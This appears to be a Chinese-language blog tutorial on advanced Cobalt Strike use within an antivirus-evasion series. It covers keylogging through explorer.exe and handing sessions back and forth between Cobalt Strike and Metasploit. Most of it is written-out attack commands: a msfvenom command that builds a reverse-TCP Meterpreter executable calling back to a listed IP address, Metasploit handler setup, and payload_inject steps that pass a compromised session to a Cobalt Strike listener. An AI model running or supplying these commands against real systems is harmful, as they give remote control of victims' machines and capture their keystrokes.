免杀0x003-CS-进阶

文章参考:qingan师傅

1
https://x9z8oggqty.feishu.cn/docx/F5A6d4el9oeX0HxwaEkcksKgnzf

键盘记录

一样在进程列表选中explorer.exe进行键盘记录

img

img

浏览器代理 (仅仅针对IE浏览器)

cs派生联动msf

msf的设置

1
use exploit/multi/handler
1
set payload windows/meterpreter/reverse_http
1
set lhost 120.55.103.132
1
set lport 7725
1
run

cs里新建监听器

payload选择foreign http

1be3ae3c-9dc8-4347-88f5-33cc4d67b72e

ip和端口选择msf设置的

d89c2198-69c7-45f9-be1f-0532a9e882f6

2da07c14-ecf8-4487-ba94-94b2b25281d4

image (2)

msf派生联动cs

msf生成一个马

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=120.55.103.132 LPORT=7720 -f exe > shell.exe
1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 120.55.103.132
set lport 7720
run

将生成的shell.exe在目标上运行

53c2bb13-1c85-479d-8e3b-7f6776f303e1

cs新建一个监听器

52658b46-eeb2-449b-a7ea-ec80ad4876a8

msf再进行设置

1
2
3
4
5
6
7
8
background  //将当前会话放到后台
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true //#默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true
set lhost 120.55.103.132 //cs监听器设置的ip
set lport 5570 //cs监听器设置的端口
set session 1 #设置要联动的会话
run #运行也可以用exploit

output

1
2
3
4
5
6
7
8
background  
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 120.55.103.132
set lport 5570
set session 2
run